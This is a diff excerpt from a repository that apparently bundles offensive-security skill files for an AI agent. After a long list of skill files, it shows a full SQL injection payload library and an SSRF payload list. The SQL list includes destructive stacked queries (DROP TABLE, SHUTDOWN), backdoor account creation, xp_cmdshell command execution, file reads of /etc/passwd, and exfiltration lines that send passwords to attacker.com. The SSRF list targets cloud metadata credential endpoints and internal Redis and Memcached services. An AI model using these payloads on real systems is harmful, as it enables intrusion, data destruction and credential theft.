- package/skills/offensive/airecon-fork/technologies-docker-container/SKILL.md +266 -0
- package/skills/offensive/airecon-fork/technologies-elasticsearch/SKILL.md +226 -0
- package/skills/offensive/airecon-fork/technologies-firebase-firestore/SKILL.md +213 -0
- package/skills/offensive/airecon-fork/technologies-frida-hooking/SKILL.md +387 -0
- package/skills/offensive/airecon-fork/technologies-gitlab-github/SKILL.md +259 -0
- package/skills/offensive/airecon-fork/technologies-jenkins/SKILL.md +256 -0
- package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md +281 -0
- package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md +230 -0
- package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/technologies-mongodb/SKILL.md +257 -0
- package/skills/offensive/airecon-fork/technologies-nginx-apache/SKILL.md +280 -0
- package/skills/offensive/airecon-fork/technologies-observability-stack-attacks/SKILL.md +501 -0
- package/skills/offensive/airecon-fork/technologies-redis/SKILL.md +236 -0
- package/skills/offensive/airecon-fork/technologies-supabase/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/technologies-tomcat/SKILL.md +232 -0
- package/skills/offensive/airecon-fork/tools-advanced-fuzzing/SKILL.md +351 -0
- package/skills/offensive/airecon-fork/tools-browser-automation/SKILL.md +300 -0
- package/skills/offensive/airecon-fork/tools-caido/SKILL.md +776 -0
- package/skills/offensive/airecon-fork/tools-code-review/SKILL.md +71 -0
- package/skills/offensive/airecon-fork/tools-dalfox/SKILL.md +189 -0
- package/skills/offensive/airecon-fork/tools-hashcat-john/SKILL.md +258 -0
- package/skills/offensive/airecon-fork/tools-impacket/SKILL.md +227 -0
- package/skills/offensive/airecon-fork/tools-install/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-metasploit/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/tools-nmap/SKILL.md +211 -0
- package/skills/offensive/airecon-fork/tools-nuclei/SKILL.md +175 -0
- package/skills/offensive/airecon-fork/tools-reporting/SKILL.md +47 -0
- package/skills/offensive/airecon-fork/tools-scripting/SKILL.md +1939 -0
- package/skills/offensive/airecon-fork/tools-semgrep/SKILL.md +202 -0
- package/skills/offensive/airecon-fork/tools-source-audit/SKILL.md +308 -0
- package/skills/offensive/airecon-fork/tools-sqlmap/SKILL.md +137 -0
- package/skills/offensive/airecon-fork/tools-tool-catalog/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/tools-wapiti/SKILL.md +293 -0
- package/skills/offensive/airecon-fork/vulnerabilities-2fa-bypass/SKILL.md +219 -0
- package/skills/offensive/airecon-fork/vulnerabilities-account-takeover/SKILL.md +223 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-schema-exposure/SKILL.md +849 -0
- package/skills/offensive/airecon-fork/vulnerabilities-api-testing/SKILL.md +278 -0
- package/skills/offensive/airecon-fork/vulnerabilities-auth-workflow/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-authentication-jwt/SKILL.md +158 -0
- package/skills/offensive/airecon-fork/vulnerabilities-bfla/SKILL.md +156 -0
- package/skills/offensive/airecon-fork/vulnerabilities-blind-xss/SKILL.md +111 -0
- package/skills/offensive/airecon-fork/vulnerabilities-business-logic/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-cors/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-crlf-injection/SKILL.md +146 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf/SKILL.md +200 -0
- package/skills/offensive/airecon-fork/vulnerabilities-csrf-advanced-bypass/SKILL.md +536 -0
- package/skills/offensive/airecon-fork/vulnerabilities-deserialization/SKILL.md +363 -0
- package/skills/offensive/airecon-fork/vulnerabilities-dom-based-vulnerabilities/SKILL.md +105 -0
- package/skills/offensive/airecon-fork/vulnerabilities-exploitation/SKILL.md +286 -0
- package/skills/offensive/airecon-fork/vulnerabilities-grpc/SKILL.md +123 -0
- package/skills/offensive/airecon-fork/vulnerabilities-host-header-injection/SKILL.md +169 -0
- package/skills/offensive/airecon-fork/vulnerabilities-http-smuggling/SKILL.md +411 -0
- package/skills/offensive/airecon-fork/vulnerabilities-idor/SKILL.md +705 -0
- package/skills/offensive/airecon-fork/vulnerabilities-information-disclosure/SKILL.md +867 -0
- package/skills/offensive/airecon-fork/vulnerabilities-insecure-file-uploads/SKILL.md +190 -0
- package/skills/offensive/airecon-fork/vulnerabilities-jwt-attacks/SKILL.md +270 -0
- package/skills/offensive/airecon-fork/vulnerabilities-kubernetes/SKILL.md +252 -0
- package/skills/offensive/airecon-fork/vulnerabilities-mass-assignment/SKILL.md +788 -0
- package/skills/offensive/airecon-fork/vulnerabilities-nosql-injection/SKILL.md +204 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-misconfig/SKILL.md +220 -0
- package/skills/offensive/airecon-fork/vulnerabilities-oauth-saml/SKILL.md +163 -0
- package/skills/offensive/airecon-fork/vulnerabilities-open-redirect/SKILL.md +167 -0
- package/skills/offensive/airecon-fork/vulnerabilities-password-reset-poisoning/SKILL.md +66 -0
- package/skills/offensive/airecon-fork/vulnerabilities-path-traversal/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-privilege-escalation/SKILL.md +320 -0
- package/skills/offensive/airecon-fork/vulnerabilities-prototype-pollution/SKILL.md +242 -0
- package/skills/offensive/airecon-fork/vulnerabilities-race-conditions/SKILL.md +192 -0
- package/skills/offensive/airecon-fork/vulnerabilities-rce/SKILL.md +240 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sensitive-file-pii-exposure/SKILL.md +589 -0
- package/skills/offensive/airecon-fork/vulnerabilities-spring4shell/SKILL.md +86 -0
- package/skills/offensive/airecon-fork/vulnerabilities-sql-injection/SKILL.md +313 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssrf/SKILL.md +183 -0
- package/skills/offensive/airecon-fork/vulnerabilities-ssti/SKILL.md +344 -0
- package/skills/offensive/airecon-fork/vulnerabilities-subdomain-takeover/SKILL.md +160 -0
- package/skills/offensive/airecon-fork/vulnerabilities-supply-chain/SKILL.md +125 -0
- package/skills/offensive/airecon-fork/vulnerabilities-unhandled-exception-differential/SKILL.md +742 -0
- package/skills/offensive/airecon-fork/vulnerabilities-waf-detection/SKILL.md +90 -0
- package/skills/offensive/airecon-fork/vulnerabilities-web-cache-poisoning/SKILL.md +233 -0
- package/skills/offensive/airecon-fork/vulnerabilities-websocket/SKILL.md +180 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xss/SKILL.md +316 -0
- package/skills/offensive/airecon-fork/vulnerabilities-xxe/SKILL.md +222 -0
- package/skills/offensive/matty-fork/cicd-redteam/SKILL.md +531 -0
- package/skills/offensive/matty-fork/cloud-security/SKILL.md +106 -0
- package/skills/offensive/matty-fork/container-escape/SKILL.md +174 -0
- package/skills/offensive/matty-fork/mobile-pentester/SKILL.md +357 -0
- package/skills/offensive/matty-fork/subdomain-takeover/SKILL.md +154 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/README.md +92 -0
- package/skills/osint/elementalsouls-fork/offensive-osint/SKILL.md +4177 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/README.md +66 -0
- package/skills/osint/elementalsouls-fork/osint-methodology/SKILL.md +1695 -0
|
@@ -0,0 +1,419 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# Full SQL Injection Payload Library (400+ payloads)
|
|
4
|
+
|
|
5
|
+
## Error-Based Payloads
|
|
6
|
+
|
|
7
|
+
### MySQL
|
|
8
|
+
```
|
|
9
|
+
'
|
|
10
|
+
"
|
|
11
|
+
' OR '1'='1
|
|
12
|
+
' OR 1=1--
|
|
13
|
+
' OR '1'='1' --
|
|
14
|
+
admin'--
|
|
15
|
+
admin' #
|
|
16
|
+
admin'/*
|
|
17
|
+
' or 1=1--
|
|
18
|
+
" or "1"="
|
|
19
|
+
') or ('1'='1
|
|
20
|
+
" or "1"="1
|
|
21
|
+
" or 1=1--
|
|
22
|
+
' OR ''='
|
|
23
|
+
' OR 'x'='x
|
|
24
|
+
" OR "x"="x
|
|
25
|
+
') OR ('x')=('x
|
|
26
|
+
") OR ("x")=("x
|
|
27
|
+
OR 1=1
|
|
28
|
+
OR 1=1--
|
|
29
|
+
OR 1=1#
|
|
30
|
+
OR 1=1/*
|
|
31
|
+
admin' OR '1'='1
|
|
32
|
+
admin' OR '1'='1'--
|
|
33
|
+
admin' OR '1'='1' #
|
|
34
|
+
admin' OR '1'='1'/*
|
|
35
|
+
admin" OR "1"="1
|
|
36
|
+
admin" OR "1"="1"--
|
|
37
|
+
```
|
|
38
|
+
|
|
39
|
+
### UNION-Based
|
|
40
|
+
```
|
|
41
|
+
' UNION SELECT NULL--
|
|
42
|
+
' UNION SELECT NULL,NULL--
|
|
43
|
+
' UNION SELECT NULL,NULL,NULL--
|
|
44
|
+
' UNION SELECT NULL,NULL,NULL,NULL--
|
|
45
|
+
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
|
|
46
|
+
' UNION SELECT username,password FROM users--
|
|
47
|
+
' UNION SELECT 1,2,3--
|
|
48
|
+
' UNION ALL SELECT NULL--
|
|
49
|
+
' UNION ALL SELECT NULL,NULL--
|
|
50
|
+
' UNION ALL SELECT username,password FROM users--
|
|
51
|
+
1' ORDER BY 1--+
|
|
52
|
+
1' ORDER BY 2--+
|
|
53
|
+
1' ORDER BY 3--+
|
|
54
|
+
1' ORDER BY 4--+
|
|
55
|
+
1' ORDER BY 5--+
|
|
56
|
+
1' ORDER BY 6--+
|
|
57
|
+
1' ORDER BY 7--+
|
|
58
|
+
1' ORDER BY 8--+
|
|
59
|
+
1' ORDER BY 9--+
|
|
60
|
+
1' ORDER BY 10--+
|
|
61
|
+
1' GROUP BY 1--+
|
|
62
|
+
1' GROUP BY 2--+
|
|
63
|
+
1' GROUP BY 3--+
|
|
64
|
+
1' HAVING 1=1--
|
|
65
|
+
1' HAVING 1=2--
|
|
66
|
+
```
|
|
67
|
+
|
|
68
|
+
### Boolean-Based (Blind)
|
|
69
|
+
```
|
|
70
|
+
' AND 1=1--
|
|
71
|
+
' AND 1=2--
|
|
72
|
+
' AND SLEEP(5)--
|
|
73
|
+
' AND BENCHMARK(5000000,MD5('A'))--
|
|
74
|
+
' AND (SELECT COUNT(*) FROM users)>0--
|
|
75
|
+
' AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'--
|
|
76
|
+
' AND ASCII(SUBSTRING((SELECT database()),1,1))>64--
|
|
77
|
+
' AND (SELECT 1)=1
|
|
78
|
+
' AND (SELECT 1)=2
|
|
79
|
+
1 AND 1=1
|
|
80
|
+
1 AND 1=2
|
|
81
|
+
1' AND '1'='1
|
|
82
|
+
1' AND '1'='2
|
|
83
|
+
```
|
|
84
|
+
|
|
85
|
+
### Time-Based
|
|
86
|
+
```
|
|
87
|
+
' AND SLEEP(5)--
|
|
88
|
+
' AND SLEEP(5)#
|
|
89
|
+
' AND SLEEP(5)--
|
|
90
|
+
' AND BENCHMARK(5000000,MD5('X'))--
|
|
91
|
+
' WAITFOR DELAY '00:00:05'--
|
|
92
|
+
' AND 1=1; WAITFOR DELAY '00:00:05'--
|
|
93
|
+
1; SLEEP(5)#
|
|
94
|
+
1'; SLEEP(5)#
|
|
95
|
+
1"; SLEEP(5)#
|
|
96
|
+
```
|
|
97
|
+
|
|
98
|
+
### PostgreSQL
|
|
99
|
+
```
|
|
100
|
+
'; SELECT pg_sleep(5)--
|
|
101
|
+
'; SELECT pg_sleep(5)--
|
|
102
|
+
'; COPY (SELECT *) TO '/tmp/test'--
|
|
103
|
+
' AND 1=1--
|
|
104
|
+
' AND 1=2--
|
|
105
|
+
' AND 1=1--
|
|
106
|
+
```
|
|
107
|
+
|
|
108
|
+
### MSSQL
|
|
109
|
+
```
|
|
110
|
+
'; WAITFOR DELAY '00:00:05'--
|
|
111
|
+
'; EXEC xp_cmdshell('dir');--
|
|
112
|
+
'; EXEC xp_cmdshell('ping 127.0.0.1');--
|
|
113
|
+
'; DROP TABLE users;--
|
|
114
|
+
'; INSERT INTO users VALUES ('hacker','password');--
|
|
115
|
+
' OR 1=1--
|
|
116
|
+
" OR 1=1--
|
|
117
|
+
```
|
|
118
|
+
|
|
119
|
+
### Oracle
|
|
120
|
+
```
|
|
121
|
+
' AND 1=1--
|
|
122
|
+
' AND 1=1--
|
|
123
|
+
' || '1'='1
|
|
124
|
+
' UNION SELECT NULL--
|
|
125
|
+
' UNION SELECT NULL FROM dual--
|
|
126
|
+
' AND 1=1--
|
|
127
|
+
```
|
|
128
|
+
|
|
129
|
+
### SQLite
|
|
130
|
+
```
|
|
131
|
+
' AND 1=1--
|
|
132
|
+
' AND 1=2--
|
|
133
|
+
' AND 1=1;--
|
|
134
|
+
```
|
|
135
|
+
|
|
136
|
+
## Stack Queries
|
|
137
|
+
```
|
|
138
|
+
'; DROP TABLE users;--
|
|
139
|
+
'; DROP TABLE users;--
|
|
140
|
+
'; EXEC xp_cmdshell('dir');--
|
|
141
|
+
'; INSERT INTO users VALUES ('hacker','password');--
|
|
142
|
+
'; CREATE USER 'hacker'@'%' IDENTIFIED BY 'password';--
|
|
143
|
+
'; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%';--
|
|
144
|
+
'; SHUTDOWN WITH NOWAIT;--
|
|
145
|
+
```
|
|
146
|
+
|
|
147
|
+
## Second-Order
|
|
148
|
+
```
|
|
149
|
+
admin'--
|
|
150
|
+
(Will be stored, then trigger on admin login)
|
|
151
|
+
```
|
|
152
|
+
|
|
153
|
+
## WAF Bypass Techniques
|
|
154
|
+
|
|
155
|
+
### Comment Obfuscation
|
|
156
|
+
```
|
|
157
|
+
/**/UN/**/ION/**/SEL/**/ECT/**
|
|
158
|
+
/**/OR/**/1=1--
|
|
159
|
+
/**/AND/**/1=1--
|
|
160
|
+
/**/UNION/**/SELECT/**
|
|
161
|
+
/**/SELECT/**/username/**/FROM/**/users--
|
|
162
|
+
```
|
|
163
|
+
|
|
164
|
+
### Encoding
|
|
165
|
+
```
|
|
166
|
+
%27%20OR%20%271%27%3D%271
|
|
167
|
+
%22%20OR%20%221%22%3D%222
|
|
168
|
+
%3D%27%20OR%20%271%27%3D%271
|
|
169
|
+
%2D%2D%20
|
|
170
|
+
```
|
|
171
|
+
|
|
172
|
+
### Whitespace Variations
|
|
173
|
+
```
|
|
174
|
+
OR%09id=1
|
|
175
|
+
OR%0Aid=1
|
|
176
|
+
OR%0Did=1
|
|
177
|
+
OR%0A%09id=1
|
|
178
|
+
OR%0Aid=1%09
|
|
179
|
+
OR%0Aid%0A=1
|
|
180
|
+
OR%00id=1
|
|
181
|
+
```
|
|
182
|
+
|
|
183
|
+
### Case Variation
|
|
184
|
+
```
|
|
185
|
+
UNion SElect
|
|
186
|
+
Or 1=1
|
|
187
|
+
AnD 1=1
|
|
188
|
+
uNiOn aLl SeLeCt
|
|
189
|
+
```
|
|
190
|
+
|
|
191
|
+
### Alternative OR/AND
|
|
192
|
+
```
|
|
193
|
+
|| id=1
|
|
194
|
+
&& id=1
|
|
195
|
+
| id=1
|
|
196
|
+
& id=1
|
|
197
|
+
^ id=1
|
|
198
|
+
%0AOR%0Aid=1
|
|
199
|
+
%0BOR%0Bid=1
|
|
200
|
+
```
|
|
201
|
+
|
|
202
|
+
### Hex Encoding
|
|
203
|
+
```
|
|
204
|
+
' OR 0x31=0x31--
|
|
205
|
+
' OR 0x31=0x32--
|
|
206
|
+
```
|
|
207
|
+
|
|
208
|
+
### Char Encoding
|
|
209
|
+
```
|
|
210
|
+
CHAR(39) OR CHAR(49)=CHAR(49)
|
|
211
|
+
```
|
|
212
|
+
|
|
213
|
+
## Database-Specific Payloads
|
|
214
|
+
|
|
215
|
+
### MySQL
|
|
216
|
+
```
|
|
217
|
+
' BENCHMARK(1000000,MD5('X'))--
|
|
218
|
+
' GROUP_CONCAT(schema_name)--
|
|
219
|
+
' INTO OUTFILE '/tmp/test'--
|
|
220
|
+
' LOAD_FILE('/etc/passwd')--
|
|
221
|
+
' SHOW DATABASES--
|
|
222
|
+
' SHOW TABLES--
|
|
223
|
+
' SHOW COLUMNS FROM users--
|
|
224
|
+
' DESCRIBE users--
|
|
225
|
+
' EXPLAIN SELECT * FROM users--
|
|
226
|
+
' FLUSH LOGS--
|
|
227
|
+
' KILL 1--
|
|
228
|
+
```
|
|
229
|
+
|
|
230
|
+
### PostgreSQL
|
|
231
|
+
```
|
|
232
|
+
'; COPY (SELECT *) TO '/tmp/test'--
|
|
233
|
+
'; CREATE EXTENSION IF NOT EXISTS loop--
|
|
234
|
+
'; DROP SCHEMA public CASCADE--
|
|
235
|
+
'; SELECT pg_read_file('/etc/passwd', 0, 1000)--
|
|
236
|
+
'; SELECT pg_ls_dir('/tmp')--
|
|
237
|
+
'; DROP TABLE IF EXISTS users CASCADE--
|
|
238
|
+
```
|
|
239
|
+
|
|
240
|
+
### MSSQL
|
|
241
|
+
```
|
|
242
|
+
'; EXEC sp_executesql N'SELECT * FROM users'--
|
|
243
|
+
'; DECLARE @sql NVARCHAR(100); SET @sql = N'SELECT * FROM users'; EXEC sp_executesql @sql--
|
|
244
|
+
'; EXEC xp_cmdshell 'ipconfig'--
|
|
245
|
+
'; EXEC xp_fileexist 'C:\windows\system32\drivers\etc\hosts'--
|
|
246
|
+
'; EXEC sp_addlogin 'hacker','password'--
|
|
247
|
+
'; EXEC sp_grantlogin 'DOMAIN\hacker'--
|
|
248
|
+
'; ALTER LOGIN DISABLE--
|
|
249
|
+
```
|
|
250
|
+
|
|
251
|
+
### Oracle
|
|
252
|
+
```
|
|
253
|
+
' AND 1=1--
|
|
254
|
+
' AND 1=1--
|
|
255
|
+
' || '1'='1
|
|
256
|
+
' UNION SELECT NULL FROM v$version--
|
|
257
|
+
' UNION SELECT banner,NULL FROM v$version--
|
|
258
|
+
' UNION SELECT username,NULL FROM all_users--
|
|
259
|
+
' UNION SELECT table_name,NULL FROM all_tables--
|
|
260
|
+
' UNION SELECT column_name,NULL FROM all_tab_columns--
|
|
261
|
+
```
|
|
262
|
+
|
|
263
|
+
### SQLite
|
|
264
|
+
```
|
|
265
|
+
' AND 1=1--
|
|
266
|
+
' AND 1=2--
|
|
267
|
+
' UNION SELECT NULL,NULL,NULL--
|
|
268
|
+
' UNION SELECT sql,NULL,NULL FROM sqlite_master--
|
|
269
|
+
' ATTACH DATABASE '/tmp/test.db'--
|
|
270
|
+
```
|
|
271
|
+
|
|
272
|
+
### MongoDB
|
|
273
|
+
'; return db.getCollectionNames(); //
|
|
274
|
+
'; return db.users.find(); //
|
|
275
|
+
'; return db.adminCommand({listDatabases:1}); //
|
|
276
|
+
```
|
|
277
|
+
|
|
278
|
+
### NoSQL
|
|
279
|
+
```
|
|
280
|
+
admin'||'1'=='1
|
|
281
|
+
admin' OR '1'='1
|
|
282
|
+
{"$ne": ""}
|
|
283
|
+
{"$gt": ""}
|
|
284
|
+
{"$regex": ".*"}
|
|
285
|
+
{"$where": "this.password.length > 0"}
|
|
286
|
+
```
|
|
287
|
+
|
|
288
|
+
## Advanced Payloads
|
|
289
|
+
|
|
290
|
+
### Out-of-Band (OAST)
|
|
291
|
+
```
|
|
292
|
+
' OR 1=1; EXEC xp_cmdshell('curl http://attacker.com?c='+(SELECT TOP 1 name FROM users));--
|
|
293
|
+
' OR 1=1; LOAD_FILE('\\\\attacker.com\\share\\file');--
|
|
294
|
+
' OR 1=1; SELECT * INTO OUTFILE '\\\\attacker.com\\share\\file' FROM users;--
|
|
295
|
+
```
|
|
296
|
+
|
|
297
|
+
### DNS Exfiltration
|
|
298
|
+
```
|
|
299
|
+
' OR 1=1; SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\file'));--
|
|
300
|
+
' OR 1=1; SELECT EXTRACTVALUE(1,CONCAT(0x5c,(SELECT password FROM users LIMIT 1)))--
|
|
301
|
+
```
|
|
302
|
+
|
|
303
|
+
### Login Bypass
|
|
304
|
+
```
|
|
305
|
+
admin'--
|
|
306
|
+
admin' #
|
|
307
|
+
admin'/*
|
|
308
|
+
admin' or '1'='1
|
|
309
|
+
admin' or 1=1--
|
|
310
|
+
admin" or "1"="1
|
|
311
|
+
admin" or 1=1--
|
|
312
|
+
admin or 1=1--
|
|
313
|
+
```
|
|
314
|
+
|
|
315
|
+
### Comment Stripping Bypass
|
|
316
|
+
```
|
|
317
|
+
admin'-- -
|
|
318
|
+
admin'# -
|
|
319
|
+
admin'/*-
|
|
320
|
+
```
|
|
321
|
+
|
|
322
|
+
### Encoding Variants
|
|
323
|
+
```
|
|
324
|
+
admin'%09or%091=1
|
|
325
|
+
admin'%0Aor%0A1=1
|
|
326
|
+
admin'%0Dor%0D1=1
|
|
327
|
+
```
|
|
328
|
+
|
|
329
|
+
### Parameter Pollution
|
|
330
|
+
```
|
|
331
|
+
id=1&id=1
|
|
332
|
+
id=1&id=2
|
|
333
|
+
id=1 OR 1=1&id=2
|
|
334
|
+
```
|
|
335
|
+
|
|
336
|
+
### Nested Queries
|
|
337
|
+
```
|
|
338
|
+
' OR (SELECT COUNT(*) FROM users) > 0 --
|
|
339
|
+
' OR (SELECT COUNT(*) FROM users) BETWEEN 0 AND 100--
|
|
340
|
+
' OR (SELECT LENGTH(password) FROM users WHERE username='admin') > 5--
|
|
341
|
+
```
|
|
342
|
+
|
|
343
|
+
## File System Access
|
|
344
|
+
|
|
345
|
+
### MySQL
|
|
346
|
+
```
|
|
347
|
+
' UNION SELECT LOAD_FILE('/etc/passwd')--
|
|
348
|
+
' UNION SELECT 'test' INTO OUTFILE '/tmp/test'--
|
|
349
|
+
' UNION SELECT NULL,NULL,NULL INTO DUMPFILE '/tmp/test'--
|
|
350
|
+
```
|
|
351
|
+
|
|
352
|
+
### PostgreSQL
|
|
353
|
+
```
|
|
354
|
+
' UNION SELECT pg_read_file('/etc/passwd')--
|
|
355
|
+
' UNION SELECT pg_ls_dir('/')--
|
|
356
|
+
' COPY users TO '/tmp/users'--
|
|
357
|
+
```
|
|
358
|
+
|
|
359
|
+
### MSSQL
|
|
360
|
+
```
|
|
361
|
+
'; BULK INSERT users FROM 'C:\windows\system32\drivers\etc\hosts';--
|
|
362
|
+
'; EXEC xp_dirtree 'C:\';--
|
|
363
|
+
'; EXEC xp_subdirs 'C:\';--
|
|
364
|
+
```
|
|
365
|
+
|
|
366
|
+
## Authentication Bypass
|
|
367
|
+
```
|
|
368
|
+
' OR '1'='1' LIMIT 1--
|
|
369
|
+
' OR '1'='1' LIMIT 1-- -
|
|
370
|
+
' OR 1=1 LIMIT 1--
|
|
371
|
+
admin' OR '1'='1' LIMIT 1#
|
|
372
|
+
```
|
|
373
|
+
|
|
374
|
+
## Privilege Escalation
|
|
375
|
+
```
|
|
376
|
+
'; GRANT ALL PRIVILEGES ON *.* TO 'hacker'@'%';--
|
|
377
|
+
'; CREATE USER 'hacker'@'%' IDENTIFIED BY 'password';--
|
|
378
|
+
'; DROP USER 'hacker'@'%';--
|
|
379
|
+
'; SHOW GRANTS FOR 'hacker'@'%';--
|
|
380
|
+
```
|
|
381
|
+
|
|
382
|
+
##Blind Injection Points
|
|
383
|
+
```
|
|
384
|
+
' AND SLEEP(5)--
|
|
385
|
+
' AND IF(1=1,SLEEP(5),0)--
|
|
386
|
+
' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END)--
|
|
387
|
+
' WAITFOR DELAY '00:00:05'--
|
|
388
|
+
```
|
|
389
|
+
|
|
390
|
+
## JSON Injection
|
|
391
|
+
```
|
|
392
|
+
{"username": "admin' OR '1'='1", "password": "test"}
|
|
393
|
+
{"username": "admin\" OR \"1\"=\"1", "password": "test"}
|
|
394
|
+
{"username": "admin' OR 1=1--", "password": "test"}
|
|
395
|
+
```
|
|
396
|
+
|
|
397
|
+
## XML Injection
|
|
398
|
+
```
|
|
399
|
+
<?xml version="1.0"?>
|
|
400
|
+
<root>
|
|
401
|
+
<username>admin' OR '1'='1</username>
|
|
402
|
+
<password>test</password>
|
|
403
|
+
</root>
|
|
404
|
+
```
|
|
405
|
+
|
|
406
|
+
## LDAP Injection
|
|
407
|
+
```
|
|
408
|
+
*)(uid=*))(|(uid=*
|
|
409
|
+
*)(objectClass=*
|
|
410
|
+
admin)(&(password=*)
|
|
411
|
+
```
|
|
412
|
+
|
|
413
|
+
## XPath Injection
|
|
414
|
+
```
|
|
415
|
+
' or '1'='1
|
|
416
|
+
' or ''='
|
|
417
|
+
' or 1=1--
|
|
418
|
+
admin' or ''='
|
|
419
|
+
```
|
|
@@ -0,0 +1,125 @@
|
|
|
1
|
+
<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
|
|
2
|
+
|
|
3
|
+
# SSRF Payloads
|
|
4
|
+
|
|
5
|
+
## Basic SSRF
|
|
6
|
+
```
|
|
7
|
+
http://127.0.0.1
|
|
8
|
+
http://localhost
|
|
9
|
+
http://[::1]
|
|
10
|
+
http://0.0.0.0
|
|
11
|
+
http://127.1
|
|
12
|
+
http://127.0.1
|
|
13
|
+
```
|
|
14
|
+
|
|
15
|
+
## Cloud Metadata Endpoints
|
|
16
|
+
|
|
17
|
+
### AWS
|
|
18
|
+
```
|
|
19
|
+
http://169.254.169.254/latest/meta-data/
|
|
20
|
+
http://169.254.169.254/latest/user-data/
|
|
21
|
+
http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
|
22
|
+
http://169.254.169.254/latest/dynamic/instance-identity/document
|
|
23
|
+
```
|
|
24
|
+
|
|
25
|
+
### Google Cloud
|
|
26
|
+
```
|
|
27
|
+
http://metadata.google.internal/computeMetadata/v1/
|
|
28
|
+
http://metadata.google.internal/computeMetadata/v1/instance/hostname
|
|
29
|
+
http://metadata.google.internal/computeMetadata/v1/instance/disks/
|
|
30
|
+
```
|
|
31
|
+
|
|
32
|
+
### Azure
|
|
33
|
+
```
|
|
34
|
+
http://169.254.169.254/metadata/instance?api-version=2021-02-01
|
|
35
|
+
http://169.254.169.254/metadata/identity/oauth2/token
|
|
36
|
+
```
|
|
37
|
+
|
|
38
|
+
### DigitalOcean
|
|
39
|
+
```
|
|
40
|
+
http://169.254.169.254/metadata/v1.json
|
|
41
|
+
http://169.254.169.254/metadata/v1/interfaces/public/0/ipv4/address
|
|
42
|
+
```
|
|
43
|
+
|
|
44
|
+
## Bypass Techniques
|
|
45
|
+
|
|
46
|
+
### DNS Rebinding
|
|
47
|
+
```
|
|
48
|
+
http://[random].dns.wtf
|
|
49
|
+
# First request: returns 127.0.0.1
|
|
50
|
+
# Second request: returns target
|
|
51
|
+
```
|
|
52
|
+
|
|
53
|
+
### DNS Shortnames
|
|
54
|
+
```
|
|
55
|
+
http://local
|
|
56
|
+
http://customerportal
|
|
57
|
+
http://internal
|
|
58
|
+
http://staging
|
|
59
|
+
```
|
|
60
|
+
|
|
61
|
+
### Protocol Smuggling
|
|
62
|
+
```
|
|
63
|
+
dict://127.0.0.1:6379/info
|
|
64
|
+
gopher://127.0.0.1:6379/_INFO
|
|
65
|
+
sftp://127.0.0.1:22
|
|
66
|
+
ldap://127.0.0.1:389
|
|
67
|
+
```
|
|
68
|
+
|
|
69
|
+
### Encoding
|
|
70
|
+
```
|
|
71
|
+
http://127.0.0.1 → http://2130706433 (decimal)
|
|
72
|
+
http://127.0.0.1 → http://0x7f000001 (hex)
|
|
73
|
+
http://127.0.0.1 → http://[::1]
|
|
74
|
+
http://example.com@127.0.0.1
|
|
75
|
+
http://127.0.0.1@example.com
|
|
76
|
+
http://127。0。0。1
|
|
77
|
+
http://127%2e0%2e0%2e1
|
|
78
|
+
```
|
|
79
|
+
|
|
80
|
+
### localhost Variations
|
|
81
|
+
```
|
|
82
|
+
localhost
|
|
83
|
+
127.0.0.1
|
|
84
|
+
127.1
|
|
85
|
+
127.0.1
|
|
86
|
+
0.0.0.0
|
|
87
|
+
::1
|
|
88
|
+
[::1]
|
|
89
|
+
```
|
|
90
|
+
|
|
91
|
+
### Filter Bypass
|
|
92
|
+
```
|
|
93
|
+
http://not127.0.0.1.ssrf.me
|
|
94
|
+
http://169.254.169.254.xip.io
|
|
95
|
+
http://metadata.google.internal
|
|
96
|
+
```
|
|
97
|
+
|
|
98
|
+
### Using Other Domains
|
|
99
|
+
```
|
|
100
|
+
http://169.254.169.254.udpn.de
|
|
101
|
+
http://metadata.googleusercontent.com
|
|
102
|
+
```
|
|
103
|
+
|
|
104
|
+
### Port Enumeration
|
|
105
|
+
```
|
|
106
|
+
http://127.0.0.1:22
|
|
107
|
+
http://127.0.0.1:3306
|
|
108
|
+
http://127.0.0.1:5432
|
|
109
|
+
http://127.0.0.1:6379
|
|
110
|
+
http://127.0.0.1:8080
|
|
111
|
+
http://127.0.0.1:8443
|
|
112
|
+
```
|
|
113
|
+
|
|
114
|
+
## Blind SSRF
|
|
115
|
+
```
|
|
116
|
+
http://your-server.com/reflect
|
|
117
|
+
http://your-server.com/log?url=
|
|
118
|
+
```
|
|
119
|
+
|
|
120
|
+
## Gopher Protocol
|
|
121
|
+
```
|
|
122
|
+
gopher://127.0.0.1:6379/_INFO
|
|
123
|
+
gopher://127.0.0.1:6379/_GET%20/test%20HTTP/1.1%0AHost:%20localhost%0A
|
|
124
|
+
gopher://127.0.0.1:11211/_stats
|
|
125
|
+
```
|